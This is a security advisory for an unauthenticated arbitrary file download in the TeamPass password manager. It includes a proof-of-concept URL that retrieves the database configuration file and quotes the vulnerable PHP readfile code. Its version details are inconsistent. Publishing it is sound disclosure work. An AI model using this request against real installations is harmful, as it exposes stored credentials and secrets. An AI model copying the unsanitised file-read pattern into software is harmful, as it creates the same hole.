TeamPass Passwords Management System 2.1.26 - Arbitrary File Download

EDB-ID:

40140

CVE:

N/A




Platform:

PHP

Date:

2016-07-21


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

1. ADVISORY INFORMATION
========================================
Title: TeamPass Passwords Management System via Unauth File Download and Arbitrary File Download
Application: TeamPass Passwords Management System
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: TeamPass Passwords Management System <= 2.1.26
Bugs:  Arbitrary File Download
Date of found:  21.03.2016
Reported:  09.05.2016
Date of Public Advisory: 13.05.2016
Author: Hasan Emre Ozer 


2. CREDIT
========================================
This vulnerability was identified during penetration test
by Hasan Emre Ozer & Halit Alptekin from PRODAFT / INVICTUS

Thank you Mehmet Ince for support

3. DESCRIPTION
========================================
We deciced to publish the vulnerability after its fix in release 2.1.26

4. VERSIONS AFFECTED
========================================
TeamPass Passwords Management System <= 2.1.10


5. TECHNICAL DETAILS & POC
========================================
Using 'downloadFile.php' file from 'sources' directory we can download any file.


Proof of Concept (POC)
 
Example for downloading database configuration:
 
http://teampass/sources/downloadFile.php?sub=includes&file=settings.php


Technical Details
<?php 
......

header("Content-disposition: attachment; filename=".rawurldecode($_GET['name']));
header("Content-Type: application/octet-stream");
header("Pragma: public");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0, public");
header("Expires: 0");
readfile('../'.$_GET['sub'].'/'.basename($_GET['file']));
?>

$_GET['sub'] and $_GET['file'] parameters vulnerable in readfile function. 



6. SOLUTION
========================================
Update to the latest version v2.1.26


7. REFERENCES
========================================
http://teampass.net/2016-05-13-release-2.1.26